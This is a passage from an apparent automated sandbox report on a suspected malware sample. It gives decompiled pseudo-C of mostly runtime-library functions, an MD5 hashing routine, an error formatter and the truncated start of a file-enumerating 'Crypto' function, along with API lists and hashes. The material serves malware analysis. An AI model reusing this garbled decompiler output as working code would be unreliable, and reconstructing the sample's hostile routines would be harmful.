std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: d64eaa11bfac195c5d644b9555346bcb132b02b1786de402be5cd468f5ac7906
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: d64eaa11bfac195c5d644b9555346bcb132b02b1786de402be5cd468f5ac7906
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00427B0B(int _a4) {
				void* _t4;

				_t1 =  &_a4; // 0x423b69
				E00427AD7(_t4,  *_t1);
				ExitProcess(_a4);
			}

0x00427b0e
0x00427b11
0x00427b1a

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00413A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00413A90(void* __ebx, int* __ecx, void* __edi, unsigned int _a4) {
				int _t19;
				void* _t21;
				unsigned int _t22;
				int _t24;
				void* _t27;
				int* _t29;
				signed int _t31;
				void* _t34;
				unsigned int _t37;
				void* _t39;
				void** _t43;
				int* _t45;
				void* _t50;

				_t29 = __ecx;
				_t43 = __ecx;
				_push(__edi);
				_t37 = _a4;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = 0;
				if(_t37 == 0) {
					L6:
					return _t43;
				} else {
					_t55 = _t37 - 0x7fffffff;
					if(_t37 > 0x7fffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L8;
					} else {
						_push(__ebx);
						_a4 = _t37 + _t37;
						_t21 = E00423B4C(__ebx, _t34, _t37, _t55, _t37 + _t37); // executed
						_t27 = _t21;
						_t50 = _t50 + 4;
						if(_t27 == 0) {
							L8:
							E0044F1BB(__eflags);
							asm("int3");
							_push(_t43);
							_t45 = _t29;
							_t19 =  *_t45;
							__eflags = _t19;
							if(_t19 != 0) {
								_t19 = L00422587(_t19);
								 *_t45 = 0;
								_t45[1] = 0;
								_t45[2] = 0;
							}
							return _t19;
						} else {
							 *_t43 = _t27;
							_t22 = _t37 + _t37;
							_t43[1] = _t27;
							_t43[2] = _t27 + _t22;
							if(_t37 != 0) {
								_t31 = _t37 >> 1;
								_t39 = _t27;
								_t24 = memset(_t39, 0, _t31 << 2);
								asm("adc ecx, ecx");
								memset(_t39 + _t31, _t24, 0);
								_t22 = _a4;
							}
							_t43[1] = _t43[1] + _t22;
							goto L6;
						}
					}
				}
			}

0x00413a90
0x00413a94
0x00413a96
0x00413a97
0x00413a9a
0x00413aa0
0x00413aa7
0x00413ab0
0x00413af8
0x00413afd
0x00413ab2
0x00413ab2
0x00413ab8
0x00413b00
0x00413b05
0x00000000
0x00413aba
0x00413abd
0x00413abf
0x00413ac2
0x00413ac7
0x00413ac9
0x00413ace
0x00413b0a
0x00413b0a
0x00413b0f
0x00413b10
0x00413b11
0x00413b13
0x00413b15
0x00413b17
0x00413b1a
0x00413b22
0x00413b28
0x00413b2f
0x00413b2f
0x00413b37
0x00413ad0
0x00413ad0
0x00413ad2
0x00413ad5
0x00413adb
0x00413ae0
0x00413ae6
0x00413ae8
0x00413aea
0x00413aec
0x00413aee
0x00413af1
0x00413af1
0x00413af4
0x00000000
0x00413af7
0x00413ace
0x00413ab8

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

Strings

vector<T> too long, xrefs: 00413B00

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
String ID: vector<T> too long
API String ID: 657562460-3788999226
Opcode ID: f5f01b68dbda021ca42eecc7f725211f068217be071155698f767f535e80c005
Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
Opcode Fuzzy Hash: f5f01b68dbda021ca42eecc7f725211f068217be071155698f767f535e80c005
Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0042FB64(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t13;

				_push(8);
				_push(0x507df0);
				_t4 = E00428520(__ebx, __edi, __esi);
				if( *0x51106c == 0) {
					E00428AF7(6);
					 *(_t13 - 4) =  *(_t13 - 4) & 0x00000000;
					_t16 =  *0x51106c;
					if( *0x51106c == 0) {
						E0042FE47(__ebx, __edx, __edi, __esi, _t16); // executed
						 *0x51106c =  *0x51106c + 1;
					}
					 *(_t13 - 4) = 0xfffffffe;
					_t4 = E0042FBAB();
				}
				return E00428565(_t4);
			}

0x0042fb64
0x0042fb66
0x0042fb6b
0x0042fb77
0x0042fb7b
0x0042fb81
0x0042fb85
0x0042fb8c
0x0042fb8e
0x0042fb93
0x0042fb93
0x0042fb99
0x0042fba0
0x0042fba0
0x0042fbaa

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 360932542-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B140 Relevance: 1.5, APIs: 1, Instructions: 45
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0040B140(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* __edi;
				intOrPtr* _t10;
				void* _t17;
				intOrPtr* _t19;
				intOrPtr* _t22;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(0x4ca78b);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_t19 = __ecx;
				_t10 = E00423B4C(__ebx, _t17, __ecx, __eflags, 0xc);
				_t22 = _t10;
				_v20 = _t22;
				_v8 = 0;
				if(_t22 == 0) {
					L4:
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 8)) = 1;
					__imp__#2(_a4); // executed
					 *_t22 = _t10;
					if(_t10 == 0 && _a4 != _t10) {
						E0044E420(0x8007000e);
						goto L4;
					}
				}
				_v8 = 0xffffffff;
				 *_t19 = _t22;
				if(_t22 == 0) {
					E0044E420(0x8007000e);
				}
				 *[fs:0x0] = _v16;
				return _t19;
			}

0x0040b143
0x0040b145
0x0040b150
0x0040b151
0x0040b158
0x0040b15d
0x0040b15f
0x0040b164
0x0040b169
0x0040b16c
0x0040b175
0x0040b1a3
0x0040b1a3
0x0040b177
0x0040b17a
0x0040b181
0x0040b188
0x0040b18e
0x0040b192
0x0040b19e
0x00000000
0x0040b19e
0x0040b192
0x0040b1a5
0x0040b1ac
0x0040b1b0
0x0040b1b7
0x0040b1b7
0x0040b1c3
0x0040b1cd

APIs

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

SysAllocString.OLEAUT32 ref: 0040B188

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: fb26ea333b87c2a560fd1b35bb3b3846c9dba5b5f10a77974d0bad5816047bab
Instruction ID: de3fca44a24d46cc943f620e61eae02331753f7f4ba9a592e9b70298839e421b
Opcode Fuzzy Hash: fb26ea333b87c2a560fd1b35bb3b3846c9dba5b5f10a77974d0bad5816047bab
Instruction Fuzzy Hash: D101BC72901666EBE7209F55D801B5ABBA4EB40BA4F10832FF914AB380D7BD9900C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00427F3D(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x00427f40
0x00427f42
0x00427f44
0x00427f47
0x00427f50

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00412900(short* __ecx, void* __edx, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				int _v20;
				intOrPtr _v28;
				short* _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				short* _t29;
				int _t38;
				int _t42;
				short* _t43;
				intOrPtr _t45;
				void* _t46;

				_push(0xffffffff);
				_push(0x4cacb0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t45;
				_t46 = _t45 - 0x10;
				_t29 = __ecx;
				_v20 = 0;
				_v8 = 0;
				_t38 =  !=  ? 0xfde9 : 0;
				_t42 = _a20 + 0x400;
				E00413A90(__ecx,  &_v32, _t38, _t42); // executed
				_v8 = 1;
				_t43 = _v32;
				_t21 =  >=  ? _a4 :  &_a4;
				MultiByteToWideChar(_t38, 0,  >=  ? _a4 :  &_a4, 0xffffffff, _t43, _t42);
				 *((intOrPtr*)(_t29 + 0x14)) = 7;
				 *(_t29 + 0x10) = 0;
				 *_t29 = 0;
				_push(_a24);
				E00418400(_t29, _t43, _v28);
				if(_t43 != 0) {
					L00422587(_t43);
					_t46 = _t46 + 4;
				}
				if(_a24 >= 0x10) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t29;
			}

0x00412903
0x00412905
0x00412910
0x00412911
0x00412918
0x0041291e
0x00412920
0x00412929
0x0041293d
0x00412940
0x00412947
0x0041294d
0x00412958
0x0041295b
0x00412966
0x0041296e
0x00412975
0x0041297e
0x00412981
0x00412988
0x0041298f
0x00412992
0x00412997
0x00412997
0x0041299e
0x004129a3
0x004129a8
0x004129b3
0x004129bd

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-00000400,-00000400), ref: 00412966

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 0c1fed4ebc66c3407f38909d6d576eaf9ee83efa2bb9236ddfd508948eb977ea
Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
Opcode Fuzzy Hash: 0c1fed4ebc66c3407f38909d6d576eaf9ee83efa2bb9236ddfd508948eb977ea
Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410FC0(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				int _v48;
				char _v52;
				char _v56;
				char _v68;
				void* __ebx;
				void* __edi;
				long** _t40;
				int* _t41;
				int _t42;
				char _t44;
				char _t50;
				void* _t72;
				CHAR** _t73;
				void* _t80;
				int _t81;
				void* _t83;
				CHAR* _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t93;

				_t79 = __edx;
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x34;
				_v20 = _t90;
				_t40 =  &_v32;
				_t73 = __edx;
				_v32 = 0;
				_t84 = __ecx;
				_v28 = 0;
				_v36 = 0;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
				if(_t40 == 0) {
					_v40 = _t40;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t41 =  &_v28;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
				if(_t41 == 0) {
					_v44 = _t41;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t42 = lstrlenA(_t84);
				__imp__CryptHashData(_v28, _t84, _t42, 0);
				if(_t42 == 0) {
					_v48 = _t42;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t85 = __imp__CryptGetHashParam;
				_v24 = 0;
				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
				_t98 = _t44;
				if(_t44 == 0) {
					_v52 = _t44;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
				_v36 = _t81;
				E0042B420(_t81, 0, _v24 + 1);
				_t92 = _t90 + 0x10;
				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
				if(_t50 == 0) {
					_v56 = _t50;
					E00430ECA( &_v56, 0x5085b8);
				}
				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
				E0042B420(_t52, 0, 0x14 + _v24 * 2);
				_t87 = 0;
				_t93 = _t92 + 0x10;
				if(_v24 > 0) {
					do {
						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
						_t93 = _t93 + 0xc;
						lstrcatA( *_t73,  &_v68);
						_t87 = _t87 + 1;
					} while (_t87 < _v24);
				}
				E00422110(_t81);
				__imp__CryptDestroyHash(_v28);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}

0x00410fc0
0x00410fd1
0x00410fd8
0x00410fde
0x00410fe1
0x00410ff0
0x00410ff2
0x00410ff9
0x00410ffb
0x00411002
0x00411009
0x00411010
0x00411018
0x0041101a
0x00411026
0x00411026
0x0041102b
0x0041103b
0x00411043
0x00411045
0x00411051
0x00411051
0x00411059
0x00411064
0x0041106c
0x0041106e
0x0041107a
0x0041107a
0x0041107f
0x00411092
0x00411099
0x0041109b
0x0041109d
0x0041109f
0x004110ab
0x004110ab
0x004110c1
0x004110c3
0x004110ca
0x004110cf
0x004110de
0x004110e2
0x004110e4
0x004110f0
0x004110f0
0x00411109
0x0041110b
0x00411110
0x00411112
0x00411118
0x00411120
0x0041112e
0x00411133
0x0041113c
0x00411142
0x00411143
0x00411120
0x00411149
0x00411154
0x0041115f
0x0041116a
0x00411177

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411900(WCHAR* __ecx, long __edx, WCHAR* _a4) {
				short _v8;
				WCHAR* _v12;
				short _v2060;
				int _t15;
				long _t36;
				void* _t44;
				WCHAR* _t48;

				_t36 = __edx;
				_v12 = __ecx;
				if(__edx == 0) {
					_t36 = GetLastError();
				}
				FormatMessageW(0x1300, 0, _t36, 0x400,  &_v8, 0, 0);
				_t15 = lstrlenW(_v8);
				_t44 = LocalAlloc(0x40, 0x50 + (_t15 + lstrlenW(_v12)) * 2);
				lstrcpyW(_t44, _v12);
				lstrcatW(_t44, L" failed with error ");
				E00412AC0(_t36,  &_v2060);
				lstrcatW(_t44,  &_v2060);
				lstrcatW(_t44, L": ");
				lstrcatW(_t44, _v8);
				_t48 = _a4;
				if(_t48 == 0) {
					MessageBoxW(0, _t44, 0, 0);
				} else {
					if(lstrlenW(_t44) < 0x400) {
						lstrcpynW(_t48, _t44, 0x400);
						E00412BA0(_t48);
					} else {
						E0042B420(_t48, 0, 0x800);
						E0042D8D0(_t48, _t44, 0x7fe);
						E00412BA0(_t48);
					}
				}
				LocalFree(_v8);
				return LocalFree(_t44);
			}

0x0041190a
0x0041190c
0x00411913
0x0041191b
0x0041191b
0x00411932
0x00411941
0x0041195f
0x00411962
0x00411974
0x0041197e
0x0041198b
0x00411993
0x00411999
0x0041199b
0x004119a0
0x004119f2
0x004119a2
0x004119ae
0x004119dc
0x004119e4
0x004119b0
0x004119b8
0x004119c4
0x004119ce
0x004119ce
0x004119ae
0x00411a01
0x00411a0c

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32 ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				WCHAR* _v92;
				short _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				signed int _v132;
				signed int _v136;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				short _v180;
				intOrPtr _v184;
				char _v204;
				struct _WIN32_FIND_DATAW _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t305;
				intOrPtr _t315;
				WCHAR* _t322;
				void* _t323;
				void* _t326;
				signed int _t330;
				signed int _t331;
				int _t333;
				signed int _t335;
				signed int _t336;
				intOrPtr _t340;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t349;
				void* _t352;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
